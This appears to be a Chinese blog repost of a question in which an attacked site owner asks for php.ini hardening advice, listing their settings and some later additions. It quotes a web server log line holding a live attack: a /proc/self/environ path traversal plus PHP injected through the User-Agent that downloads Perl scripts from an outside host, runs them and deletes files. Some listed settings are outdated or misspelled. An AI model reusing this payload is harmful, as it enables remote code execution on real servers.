信息安全 - 攻击后的php.ini安全设置 - 吾爱随笔录

我的网站遭到了攻击，我需要一个 php.ini 的最佳实践我已经阅读了一些内容，但我仍然不确定我是否涵盖了大多数选项。

这是我的设置：

file_uploads = Off
upload_tmp_dir = /var/php_tmp
upload_max_filezize = 0M
allow_url_fopen = Off
allow_url_include = Off
safe_mode = On
display_errors = Off
magic_quotes_gpc = On
magic_quotes_runtime = On
max_file_uploads=0

这是我从 webhost 公司得到的错误日志：

121.254.216.170 - - [12/Sep/2011:05:21:07 +0100] "GET /?p=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5806 "-" "http://some.thesome.com/etc/byz.jpg? -O /tmp/cmd548;cd /tmp;lwp-download http://some.thesome.com/etc/cup.txt;perl cup.txt;rm -rf *.txt*;wget http://some.thesome.com/etc/update.txt;perl update.txt;rm -rf *.txt*'); echo \"#j13mb0t\"; ?>"

expose_php = off disable_functions = phpinfo session.auto_start = 0 session.cookie_httponly = 1 session.cookie_secure = 1 session.name = sessId session.hash_function = sha256 session.hash_bits_per_character = 5